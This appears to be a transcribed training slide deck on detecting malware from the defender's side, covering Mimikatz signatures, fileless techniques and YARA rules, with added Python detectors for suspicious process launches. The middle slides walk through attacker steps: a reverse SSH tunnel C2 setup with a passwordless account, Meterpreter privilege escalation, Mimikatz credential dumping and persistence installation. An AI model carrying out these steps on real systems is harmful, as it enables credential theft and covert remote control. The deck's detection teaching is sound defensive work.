Published by Ross Anderson. Modified over 6 years ago.
1
Malware Insert Ominous and Pretentious Title Here. Seriously, it’s just software
2
Red Team vs. Blue Team Most resources and training describe what the attacker sees or how the attack works. They very rarely show the indicators seen by defenders. We will look at harvesting indicators and detecting malicious events on a network. © Dr. D. Kall Loper, all rights reserved
3
Malware Delivery (diagram)
Trojanized MS Word Document -> VBA Script -> Object with Shellcode Embedded / Object with Obfuscated Binary Embedded -> Payload
Payload stages: Execute Local / Drop Downloader -> Command & Control; Persistence; Lateral Movement/Pivot
4
Malware Delivery in the Environment
(diagram) Internet -> Firewall/AMP/Threat IDS/IPS -> End Point: Trojanized MS Word Document -> VBA Script -> Object with Obfuscated Binary Embedded -> Windows Services/Executables on System -> Payload (Execute Local / Drop Downloader; Command & Control; Persistence; Lateral Movement/Pivot)
5
Malware Families
Malware is classified into object groups by analysts and AV vendors, but each individual or group often does not agree on which criteria are definitive.

The Hacker Tool: Mimikatz (VirusTotal analysis)

File detail
    Copyright: Copyright (c) gentilkiwi (Benjamin DELPY)
    Product: mimikatz
    Original name: mimikatz.exe
    Internal name: mimikatz
    File version:
    Description: mimikatz for Windows

PE header basic information
    Target machine: x64
    Compilation timestamp: :34:28
    Entry Point: 0x0002A954
    Number of sections: 6

PE sections
    Name     Virtual address  Virtual size  Raw size  Entropy  MD5
    .text    4096             197873        198144    6.31     180f5b44830e808ffa813de556377f63
    .rdata   204800           190216        190464    3.90     aa0c2a1b850162c9bde827ac7fe419db
    .data    397312           15800         13824     2.83     912ef60fc0f1231b0583a30a171d127a
    .pdata   413696           6312          6656      5.30     f35f e21c8a99b6a2368d497fb
    .rsrc    421888           16376         16384     6.55     ae daed498d0ea56095c3088
    .reloc   438272           5324          5632      4.87     1b1ed1569d3d2a bfe374bc8

PE imports
    ADVAPI32.dll, CRYPT32.dll, HID.DLL, KERNEL32.dll, NETAPI32.dll, NTDSAPI.dll, RPCRT4.dll, SAMLIB.dll, SETUPAPI.dll, SHELL32.dll, SHLWAPI.dll, Secur32.dll, USER32.dll, cryptdll.dll, msvcrt.dll, ntdll.dll

Number of PE resources by type: RT_ICON 3, RT_VERSION 1, RT_GROUP_ICON 1
Number of PE resources by language: ENGLISH US 5

ExifTool file metadata
    SpecialBuild: kiwi flavor !
    SubsystemVersion: 5.2
    LinkerVersion: 9.0
    ImageVersion: 0.0
    FileSubtype:
    FileVersionNumber:
    LanguageCode: English (U.S.)
    FileFlagsMask: 0x003f
    FileDescription: mimikatz for Windows
    CharacterSet: Unicode
    InitializedDataSize: 235008
    PrivateBuild: Build with love for POC only
    EntryPoint: 0x2a954
    OriginalFileName: mimikatz.exe
    MIMEType: application/octet-stream
    LegalCopyright:
    FileVersion:
    TimeStamp: 2016:05:01 00:34:28+01:00
    FileType: Win64 EXE
    PEType: PE32+
    InternalName: mimikatz
    ProductVersion:
    UninitializedDataSize:
    OSVersion:
    FileOS: Windows NT
    Subsystem: Windows command line
    MachineType: AMD AMD64
    CompanyName: gentilkiwi (Benjamin DELPY)
    CodeSize: 198144
    ProductName:
    ProductVersionNumber:
    FileTypeExtension: exe
    ObjectFileType: Executable application

Antivirus results
    Kaspersky: HEUR:Trojan-PSW.Win32.Mimikatz.gen
    McAfee: RDN/Generic PUP.z
    Symantec: Trojan.Gen.2
    ClamAV: Not Detected as Malware (6/24/2016)
6
VirusTotal Aggregates Multiple Vendors
7
Scanning with Signatures
Hash/String/0xChain
The essence of AV scanning is to compare the whole file to a hash of known malware. There are refinements that allow scanning of known sections or even storage blocks of the file (not physical blocks). Other techniques search for strings or chains of hexadecimal.
"A related effort in the context of Indicators of Compromise is OpenIOC, which includes IOC Editor and IOC Finder." -Zeltser
8
Scanning with Signatures
IoCs are:
- Key locations with constant values, known strings, constant sizes (whole file or sections), groupings of suspicious API calls, function names, and many other programming artifacts
- Locations and techniques for randomly generating names in the file system or for network connections
- IPs and domains built into the malware
"A related effort in the context of Indicators of Compromise is OpenIOC, which includes IOC Editor and IOC Finder." -Zeltser
9
Scanning with Signatures
Artifacts from compilation can help identify a specimen.
    FileVersionNumber:
    LanguageCode: English (U.S.)
    FileFlagsMask: 0x003f
    FileDescription: mimikatz for Windows
    InitializedDataSize:
    EntryPoint: 0x2a954
    OriginalFileName: mimikatz.exe
    FileVersion:
    TimeStamp: 2016:05:01 00:34:28+01:00
    FileType: Win64 EXE
    PEType: PE32+
    InternalName: mimikatz
    ProductVersion:
    UninitializedDataSize: 0
    OSVersion: 5.2
    FileOS: Windows NT
    Subsystem: Windows command line
    MachineType: AMD AMD64
    CodeSize:
    ProductName: mimikatz
    ProductVersionNumber:
    FileTypeExtension: exe
    ObjectFileType: Executable application
10
Scanning with Signatures
Heuristic rules can detect suspicious collections of functionality being imported into a process. DLL import lists can be an important IoC, but they are not the only ones. These DLLs are imported by a W32 PE file identified as Mimikatz:
    ADVAPI32.dll    NETAPI32.dll    SETUPAPI.dll    USER32.dll
    CRYPT32.dll     NTDSAPI.dll     SHELL32.dll     cryptdll.dll
    HID.DLL         RPCRT4.dll      SHLWAPI.dll     msvcrt.dll
    KERNEL32.dll    SAMLIB.dll      Secur32.dll     ntdll.dll
11
Scanning with Signatures
MD5 hashes for sections of a W32 PE file identified as Mimikatz.
    Name     Virtual Address  Virtual Size  Raw Size  Entropy  MD5
    .text    4096             197873        198144    6.31     180f5b44830e808ffa813de556377f63
    .rdata   204800           190216        190464    3.9      aa0c2a1b850162c9bde827ac7fe419db
    .data    397312           15800         13824     2.83     912ef60fc0f1231b0583a30a171d127a
    .pdata   413696           6312          6656      5.3      f35f e21c8a99b6a2368d497fb
    .rsrc    421888           16376         16384     6.55     ae daed498d0ea56095c3088
    .reloc   438272           5324          5632      4.87     1b1ed1569d3d2a bfe374bc8
12
Scanning with Signatures
*YARA comes later
Unique strings and metadata from the compiler can help identify a specimen.
    SpecialBuild: kiwi flavor !
    PrivateBuild: Build with love for POC only
    LegalCopyright: Copyright (c) gentilkiwi (Benjamin DELPY)
    CompanyName: gentilkiwi (Benjamin DELPY)
14
Mimikatz
Definition: Mimikatz is a post-exploitation tool. It is also available as a Meterpreter script. Mimikatz is "well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets." (emphasis original)
15
Mimikatz
Has both 32-bit and 64-bit versions. If a 32-bit process is initiated by Metasploit, the 32-bit version of Mimikatz will load.
Needs System-level privileges (SID: S).
Needs Mimikatz.exe and sekurlsa.dll functionality on the target system.
Version 1 can be run as a Metasploit script. Can be PyEx'd.
16
Mimikatz in Action (diagram)
Trojanized MS Word Document -> VBA Script -> Object with Obfuscated Binary Embedded -> Drop: Obfuscated Crypto Key; Drop: Decrypted Metasploit stager (~70k)
17
Stager
Definition: Malware function that deobfuscates, decrypts, installs, or otherwise unpacks malicious content. Also called Downloader or Dropper depending on the method used.
18
Definition: WMIC (Windows™ Management Instrumentation Command-line)
"Everything you can do in the GUI, you can do in the command line." A command-line and scripting host that uses aliases to access Windows administrative functions. Syntax: Alias - Verb - Switch. Reference: WMIC
19
Definition: PowerShell
Windows PowerShell is a Windows command-line shell designed especially for system administrators. Windows PowerShell includes an interactive prompt and a scripting environment.
20
Embedded WMIC & PowerShell
Various combinations of Windows Scripting Host, WMIC, and PowerShell can be invoked to bypass AV and even AMP. Process filters like Tanium™ or Carbon Black™ can be used to check for invocations, but there are many false positives.
21
Mimikatz in the Environment
(diagram) Internet -> Downloader (blocked: X) -> Firewall/AMP/Threat IDS/IPS -> End Point: Windows Services/Executables on System -> Payload: Sekurlsa.dll & Mimikatz.exe
22
Carbon Black's View
23
Fileless Malware
Poweliks is true fileless malware, leaving no files on the disk. Instead, it hides code in the Registry. It is undetectable by signature-based scanners and needs to be caught at execution.
- Poweliks (Downloader)
- Gootkit (Banking malware), also called XSW, XSWKit, Hpmal. Not truly fileless: it uses a rootkit to hide its file from scanners.
- Kovter (Clickfraud/cryptoware). Not truly fileless, but it uses a legitimate program's memory space to execute for persistence.
24
Deobfuscation 1
    "C:\Windows\System32\cmd.exe" /C start "" "C:\Users\Victim\AppData\Roaming\fce81\d5d42.d806c1"
Runs an innocuous function in a shady place with a mutex-like/pseudo-random name. However, it avoids searches for processes running from a "temp" directory.
25
Deobfuscation 2
    "C:\Windows\System32\mshta.exe" "javascript:Lm6fll="T8YxIEPM";z1U=new ActiveXObject("Wscriptshell");qkfO8eh="iMvZ11iC";No3oT=z1U.RegRead("HKCU\\software\\fyucgba\\zgrwg");h6x4ZFa="Y";eval(No3oT);lg6bUHtz="SiaYLh58";"
26
Deobfuscation 2, MSHTA cont.
Rearranged, with the junk variable assignments removed:
    javascript: eval(new ActiveXObject("Wscriptshell").RegRead("HKCU\\software\\fyucgba\\zgrwg"))
Mshta is the built-in function to decompile "HTML-compiled" or "hta" archives, which may include JavaScript.
27
Deobfuscation 3
    "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:sytb
Uses PowerShell to invoke an expression (iex) stored in the environment variable ($env:) "sytb".
28
Deobfuscation, More Generally
PowerShell launched with the Invoke-Expression argument:
    powershell.exe    cmdline: iex
rundll32.exe launched with JavaScript:
    rundll32.exe "mshtml,runhtmlapplication"
29
Deobfuscation, More Generally
rundll32 launching PowerShell:
    powershell.exe    parent process: rundll32.exe
PowerShell launching dllhost:
    parent process: powershell.exe    child process: dllhost.exe
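The indicators from the three Deobfuscation slides and the two "More Generally" slides, as an added example that is not part of the presentation: Python heuristics run over constructed Sysmon-style process-creation events (image, command line, parent image; not real telemetry). The rules are the page's own indicators (iex in a PowerShell command line, mshta with inline javascript:, rundll32 with mshtml,RunHTMLApplication, rundll32 spawning PowerShell, PowerShell spawning dllhost) plus one for the Deobfuscation 1 case: something launched from a user-writable directory with a hex-like random name. The event field names and rule names are assumptions of the example. As the Embedded WMIC & PowerShell slide says, such process filters produce false positives, so two benign events are included to show the rules stay quiet on ordinary administration.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (image, command line, parent).
# Not real telemetry; the command lines mirror the patterns on the slides.
EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C start "" "C:\Users\Victim\AppData\Roaming\fce81\d5d42.d806c1"'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "javascript:z1U=new ActiveXObject("Wscriptshell");eval(z1U.RegRead("HKCU\\software\\fyucgba\\zgrwg"));"'},
    {"image": r"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:sytb'},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'rundll32.exe "mshtml,RunHTMLApplication" javascript:placeholder'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\Victim\AppData\Local\Temp\stage.ps1"},
    {"image": r"C:\Windows\System32\dllhost.exe", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\System32\dllhost.exe /Processid:{placeholder-guid}"},
    # Benign administration, included so the false-positive behaviour is visible.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\Backup-Files.ps1"},
    {"image": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

# Directories an unprivileged user can write to, where droppers tend to land.
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|Temp|ProgramData)\\", re.I)
# A path component that is nothing but hex digits (e.g. fce81, d5d42.d806c1) reads as generated.
RANDOM_NAME = re.compile(r"^[0-9a-f]{5,}(\.[0-9a-f]{5,})?$", re.I)

def random_looking_path(path):
    """True when a path under a user-writable directory has a hex-like generated component."""
    if not USER_WRITABLE.search(path):
        return False
    return any(RANDOM_NAME.match(part) for part in path.split("\\"))

def suspicious(event):
    """Return the names of the slide's indicators that this one event trips."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"].lower()
    hits = []
    if image == "powershell.exe" and re.search(r"\b(iex|invoke-expression)\b", cmd):
        hits.append("powershell_invoke_expression")        # Deobfuscation 3, More Generally
    if image == "mshta.exe" and "javascript:" in cmd:
        hits.append("mshta_inline_javascript")             # Deobfuscation 2
    if image == "rundll32.exe" and "mshtml,runhtmlapplication" in cmd:
        hits.append("rundll32_runhtmlapplication")         # More Generally
    if image == "powershell.exe" and parent == "rundll32.exe":
        hits.append("rundll32_spawns_powershell")          # More Generally
    if image == "dllhost.exe" and parent == "powershell.exe":
        hits.append("powershell_spawns_dllhost")           # More Generally
    if random_looking_path(event["image"]) or random_looking_path(event["cmdline"]):
        hits.append("random_name_in_user_writable_dir")    # Deobfuscation 1
    return hits

def triage(events):
    """(index, hits) for every event that trips at least one rule."""
    flagged = []
    for i, ev in enumerate(events):
        hits = suspicious(ev)
        if hits:
            flagged.append((i, hits))
    return flagged

if __name__ == "__main__":
    for i, hits in triage(EVENTS):
        print(f"event {i}: {', '.join(hits)}  <-  {EVENTS[i]['cmdline']}")
```

Each rule is deliberately narrow so that an analyst can see which slide's indicator fired; in a real pipeline the parent/child rules need the process tree from the endpoint sensor, and the hex-name heuristic should be tuned against the environment's own software inventory before it is allowed to page anyone.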
30
Command and Control Reverse HTTP Shells
Any protocol can be embedded in almost any other protocol. Quick and dirty with NGINX.
The attacker needs: a server with a public IP, a domain name, a wildcard DNS entry in the domain pointing to the public IP, an NGINX server, and SSHD running on the server.

Wildcard DNS
A wildcard DNS record should point to this NGINX instance. Every www<port>.domain.tld will be proxied to :<port>, where <port> needs to be 4 or 5 digits.

NGINX Configuration
    server {
        server_name "~^www(?<port>\d{4,5})\.domain\.tld$";
        location / {
            proxy_pass
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header Host $host;
        }
    }

SSH Configuration
Without some control the compromised host could get full shell access on the attacker! The compromised host will be given the username "p0wnd". The following line will create the user "p0wnd" in /etc/shadow with no password.
    sshd -f /etc/ssh/sshd_config_p0wnd
Add the following lines to /etc/ssh/sshd_config:
    Match User p0wnd
        # ChrootDirectory
        ForceCommand /bin/echo do-not-send-commands
        AllowTcpForwarding yes
        PasswordAuthentication yes
        PermitEmptyPasswords yes
Configure PAM if it is used. It should be. Add the following line to pam_access.so:
    + : p0wnd : ALL
This allows "p0wnd" to log in from anywhere.
References: SSH Man Page
31
Reverse Shell in Action
(diagram) Compromised Host (End Point: Windows Services/Executables on System) -> Firewall/AMP/Threat IDS/IPS -> Internet
Command run on the compromised host:
    ssh -N -T <routable IP> -l p0wnd -R 0:localhost:1337 -p 51337

SSH invocation, option by option (from the ssh man page):
    -N    Do not execute a remote command. This is useful for just forwarding ports.
    -T    Disable pseudo-terminal allocation.
    <routable IP>    An IP usable on the open Internet (non-reserved IP).
    -l login_name    Specifies the user to log in as on the remote machine. This also may be specified on a per-host basis in the configuration file. Here: "p0wnd".
    -R [bind_address:]port:host:hostport    Specifies that connections to the given TCP port on the remote (server) host are to be forwarded to the given host and port on the local side. This works by allocating a socket to listen to a TCP port on the remote side. Whenever a connection is made to this port, the connection is forwarded over the secure channel, and a connection is made to hostport from the local machine. If the port argument is `0', the listen port will be dynamically allocated on the server and reported to the client at run time.
    -p port    Port to connect to on the remote host. This can be specified on a per-host basis in the configuration file. The port selected here is because even bad security admins, forensic analysts, and incident responders need a break.
References: SSH Man Page

A reverse HTTP(S) shell shows as normal port 80 (443) traffic from an internal host to an Internet server. Proxies can be authenticated with UN:PW.
32
Segue A transition from old to new
The only reason I care about Steve Jobs is that he was friends with Woz.
33
Mimikatz & Metasploit
Once a system is compromised, the intruder usually attempts to escalate, persist, and pivot within the environment. The priority of these tasks varies with the attacker. With many established locations in the network, the attacker may feel more free to be noisy.
34
Mimikatz & Metasploit
Metasploit provides a mechanism to pursue these goals in an interactive environment that doesn't require wmic or cmd.exe. Meterpreter provides a platform to invoke Metasploit modules and other utilities.
Recall Mimikatz's requirements:
- Has both 32-bit and 64-bit versions.
- Needs System-level privileges.
- Needs Mimikatz.exe and sekurlsa.dll functionality on the target system.
35
Mimikatz & Metasploit
    meterpreter > getuid
    Server username: p0wndbox\Administrator
    meterpreter > getsystem -t 1
    ... got system (via technique 1).
    Server username: NT AUTHORITY\SYSTEM
Technique 0, "getsystem -t 0", tries all three techniques.
Technique 1, named pipe and service impersonation. Runs cmd.exe /c echo "data" >\\.\pipe\<random>. It uses a named pipe and cmd.exe to create a service and impersonate the "SYSTEM" context.
Technique 2, schedules rundll32.exe to run a DLL dropped on the system (noisy).
Technique 3, reflective DLL injection. Requires SeDebugPrivilege. Uses elevator.dll to get a SYSTEM token and applies it to meterpreter.
Also possible to generate the payload as an executable and run it using SC.exe. The executable can be scheduled to run with at.exe. NOTE: at does not invoke cmd.exe; call it explicitly: "cmd netstat -an > Nestat-%time%.txt"
36
Mimikatz & Metasploit
    meterpreter > sysinfo
    Computer        : p0wndbox
    OS              : Windows 7 (Build 7601, Service Pack 1).
    Architecture    : x86
    System Language : en_US
    Meterpreter     : x86/win64
sysinfo verifies the processor type, which determines which meterpreter to load.
37
Mimikatz & Metasploit
    meterpreter > load mimikatz
    Loading extension mimikatz...success.
    meterpreter > mimikatz_command -f samdump::hashes
    Ordinateur : p0wndbox
    BootKey : e6b4d597a52c1211c21a539dee2ffa20

    Rid : 500
    User : Administrator
    LM :
    NTLM : 5918b20466d798aeeac5f789fb186326

    Rid : 501
    User : Guest
    ...and many others
38
Mimikatz & Metasploit
    meterpreter > mimikatz_command -f sekurlsa::searchPasswords
    [0] { Administrator ; p0wndbox ; password123 }
Metasploit has version 1.0 of mimikatz built in. The earlier version required separate steps to set debug privileges and inject sekurlsa.dll into lsass.exe. It was more exciting than the above.
39
Definition: LSASS (Local Security Authority Subsystem Service)
Manages Windows user authentication.
    Location: C:\Windows\System32\lsass.exe
    MD5: a3399d19610ce2d71e0c3e5d9
    Size: 31,312 bytes
40
LSASS Dependent Services
    CNG Key Isolation (KeyIso / keyiso.dll): Provides key process isolation to private keys and associated cryptographic operations as required by the Common Criteria.
    Credential Manager (VaultSvc / vaultsvc.dll): Provides secure storage and retrieval of credentials to users, applications and security service packages.
    Encrypting File System (EFS) (EFS / efssvc.dll): The core file encryption technology used to store encrypted files on NTFS volumes.
    Netlogon (Netlogon / netlogon.dll): Network Authentication: Maintains a secure channel between the local computer and the domain controller for authenticating users and services.
    Protected Storage (ProtectedStorage / psbase.dll): Provides protected storage for sensitive data, such as passwords, to prevent access by unauthorized services, processes, or users.
    Security Accounts Manager (SamSs / samsrv.dll): The startup of this service signals other services that the Security Accounts Manager (SAM) is ready to accept requests.
41
LSASS on an Active System
42
Metasploit Persistence
    meterpreter > run persistence -U -i 30 -p 443 -r
    [*] Creating a persistent agent: LHOST= LPORT=443 (interval=30 onboot=true)
    [*] Persistent agent script is bytes long
    [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\121e2J5d.vbs
    [*] Agent executed with PID 354
    [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\491h2121e2KL539
    [*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NyFBv8tnNNBdX0z
    [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/p0wndbox_ /clean_up__ rc
    meterpreter >
Options (Metasploit help, invoked with "run persistence -h"):
    -A    Automatically start a matching multi/handler to connect to the agent
    -U    Automatically start the agent when the User logs on
    -X    Automatically start the agent when the system boots
    -h    This help menu
    -i    The interval in seconds between each connection attempt
    -p    The port on the remote host where Metasploit is listening
    -r    The IP of the system running Metasploit listening for the connect back
43
Segue The only reason I care about Steve Jobs is that he was friends with Woz.
44
YARA
Definition: A tool to classify and identify malware. YARA definitions (rules) can identify a malware family or an individual specimen through strings and Boolean logic.
45
YARA, Good Practice
The best YARA rules describe behavior that is necessary to the malicious function of the malware and sufficient to distinguish the malware from accepted software or even from other families of malware. Risk strategies can be based on sufficiently accurate categorization of threats. Reference
46
YARA, Good Practice
Strings, resources, and function bytes tend to make the best YARA rule subjects. Statically coded passwords, domains, and file paths change; they are time-sensitive to a particular family. They are also VERY useful in network threat feeds. When coding rules, do not include common variables and common code libraries. Rules should describe a unique feature set. Reference
47
YARA, Good Practice
Refine YARA rules with feedback from the IR team and the Threat Intel team. Compiler-produced strings may be useful for searching with host-based tools like Carbon Black or for direct analysis, but they are not good for automated scanning because of the false positives. Shellcode for malicious actions makes almost "heuristic" generic rules. Reference
48
49
YARA Signature for Mimikatz
rule mimikatz
{
    meta:
        description = "mimikatz"
        author      = "Benjamin DELPY (gentilkiwi)"
        tool_author = "Benjamin DELPY (gentilkiwi)"

    strings:
        $exe_x86_1 = { [0-3] 30 8d 04 bd }
        $exe_x86_2 = { [0-3] 38 8d 04 b5 }
        $exe_x64_1 = { 4c 03 d8 49 [0-3] 8b }
        $exe_x64_2 = { 4c 8b df 49 [0-3] c1 e [0-3] 8b cb 4c 03 [0-3] d8 }
        $dll_1     = { c7 0? [4-14] c7 0? }
        $dll_2     = { c7 0? ?? 89 4? }
        $sys_x86   = { a [0-4] b c }
        $sys_x64   = { c [0-4] e f }

    condition:
        (all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*))
}
50
YARA Signature for Mimikatz
rule mimikatz_lsass_mdmp
{
    meta:
        description = "LSASS minidump file for mimikatz"
        author      = "Benjamin DELPY (gentilkiwi)"

    strings:
        $lsass = "System32\\lsass.exe" wide nocase

    condition:
        (uint32(0) == 0x504d444d) and $lsass
}
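The all-of-the-$dll_ strings from the mimikatz rule and the mimikatz_lsass_mdmp rule above, evaluated by an added example that is not part of the presentation or of the mimikatz project: a reduced pure-Python matcher for the subset of YARA these slides use (hex strings with nibble wildcards and jumps, text strings with the wide and nocase modifiers, and uint32 at an offset). The patterns are copied as printed on the slide; the data it runs on is constructed (a fake minidump header followed by a UTF-16 lsass path, and a few bytes shaped to hit both dll patterns). In practice use yara-python; this block exists to make the matching semantics visible.

```python
import re
import struct

def compile_hex(pattern):
    """Translate a YARA hex string into a bytes regex.
    Handles whole bytes (c7), nibble wildcards (0?, ?f, ??) and jumps ([4-14])."""
    body = pattern.strip().strip("{}")
    parts = []
    for tok in body.split():
        jump = re.fullmatch(r"\[(\d+)-(\d+)\]", tok)
        if jump:
            parts.append(b".{%d,%d}" % (int(jump.group(1)), int(jump.group(2))))
        elif re.fullmatch(r"[0-9a-fA-F?]{2}", tok):
            hi, lo = tok
            matching = bytes(b for b in range(256)
                             if (hi == "?" or b >> 4 == int(hi, 16))
                             and (lo == "?" or b & 0xF == int(lo, 16)))
            parts.append(b"." if len(matching) == 256
                         else b"[" + b"".join(b"\\x%02x" % b for b in matching) + b"]")
        else:
            raise ValueError(f"unsupported hex token: {tok!r}")
    return re.compile(b"".join(parts), re.DOTALL)

def compile_text(text, wide=False, nocase=False):
    """Translate a YARA text string with the 'wide' (UTF-16LE) and 'nocase' modifiers."""
    parts = []
    for ch in text:
        raw = ch.encode("ascii")
        if nocase and ch.isalpha():
            unit = (b"[" + re.escape(ch.lower().encode("ascii"))
                    + re.escape(ch.upper().encode("ascii")) + b"]")
        else:
            unit = re.escape(raw)
        parts.append(unit + b"\x00" if wide else unit)
    return re.compile(b"".join(parts), re.DOTALL)

# Strings exactly as printed on the slides.
DLL_1 = compile_hex("{ c7 0? [4-14] c7 0? }")
DLL_2 = compile_hex("{ c7 0? ?? 89 4? }")
LSASS = compile_text("System32\\lsass.exe", wide=True, nocase=True)

def rule_mimikatz_dll(data):
    """The '(all of ($dll_*))' branch of the mimikatz rule: both patterns must be present."""
    return all(p.search(data) is not None for p in (DLL_1, DLL_2))

def rule_mimikatz_lsass_mdmp(data):
    """condition: (uint32(0) == 0x504d444d) and $lsass"""
    if len(data) < 4:
        return False
    magic = struct.unpack_from("<I", data, 0)[0]          # little-endian, like YARA's uint32()
    return magic == 0x504D444D and LSASS.search(data) is not None

# Constructed inputs (not real files). b"MDMP" read little-endian is 0x504d444d, the minidump magic.
MDMP_SAMPLE = b"MDMP" + b"\x00" * 28 + "C:\\Windows\\SYSTEM32\\LSASS.EXE".encode("utf-16-le")
NOT_MDMP = b"PE\x00\x00" + "C:\\Windows\\System32\\lsass.exe".encode("utf-16-le")
ASCII_ONLY = b"MDMP" + b"C:\\Windows\\System32\\lsass.exe"      # narrow string: 'wide' will not match
DLL_SAMPLE = b"\xc7\x05" + b"\x00" * 6 + b"\xc7\x06" + b"\xc7\x04\x11\x89\x45"

if __name__ == "__main__":
    for label, blob in [("MDMP_SAMPLE", MDMP_SAMPLE), ("NOT_MDMP", NOT_MDMP), ("ASCII_ONLY", ASCII_ONLY)]:
        print(f"mimikatz_lsass_mdmp({label}) = {rule_mimikatz_lsass_mdmp(blob)}")
    print(f"all of ($dll_*) on DLL_SAMPLE = {rule_mimikatz_dll(DLL_SAMPLE)}")
```

Two details matter for writing rules against LSASS dumps: the magic check is cheap and runs first, so files that are not minidumps never reach the string search, and the "wide" modifier is what makes the rule see the UTF-16 path that Windows writes into the dump, which the narrow ASCII_ONLY sample shows by not matching.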
51
YARA Signature for Mimikatz
rule mimikatz_kirbi_ticket
{
    meta:
        description = "KiRBi ticket for mimikatz"
        author      = "Benjamin DELPY (gentilkiwi)"

    strings:
        $asn1 = { ?? ?? ?? ?? a a }

    condition:
        $asn1 at 0
}
Kerberos uses ASN.1 (Abstract Syntax Notation One) encoding of the data in its packets (RFC). This requires a grammar to be established to decipher the bit stream (for PER, Packed Encoding Rules) or byte stream (XER, XML Encoding Rules).
52
YARA Signature for Mimikatz
rule wce
{
    meta:
        description = "wce"
        author      = "Benjamin DELPY (gentilkiwi)"
        tool_author = "Hernan Ochoa (hernano)"

    strings:
        $hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff e8 [0-3] 5d c }
        $hex_x86    = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] d }
        $hex_x64    = { ff f ec b d9 48 8d 15 [0-16] d }

    condition:
        any of them
}
wce: Windows Credential Editor
53
Mutex in YARA Rules
Mutexes are among the IoCs most unique to the malware using them. They are also the most mercurial. A particular mutex can be used during an outbreak, but it is not a stable IoC in the long term.
54
Definition: Mutex (Mutual Exclusion)
An object that signals whether it is owned or not owned. Any thread with a handle to a mutex object can request ownership of the mutex object. If not owned, the mutex is assigned to the requesting process, granting access to a shared memory space. References: Mutex Objects, Mutex
55
Definition: Mutex (Mutual Exclusion)
A special-use counting semaphore with a count of one that can only be unlocked by the locking process. References: Mutex Objects, Mutex
56
Mutex in Malware What does a Mutex do for Malware?
It is one mechanism to prevent reinfection of the host system.
57
Without Mutex: The RTM Worm (Source)
In 1988, 99 lines of code. Exploited fingerd, sendmail debug mode, and implemented a 432-word dictionary attack on rsh and rexec. It didn't stop until the Internet did.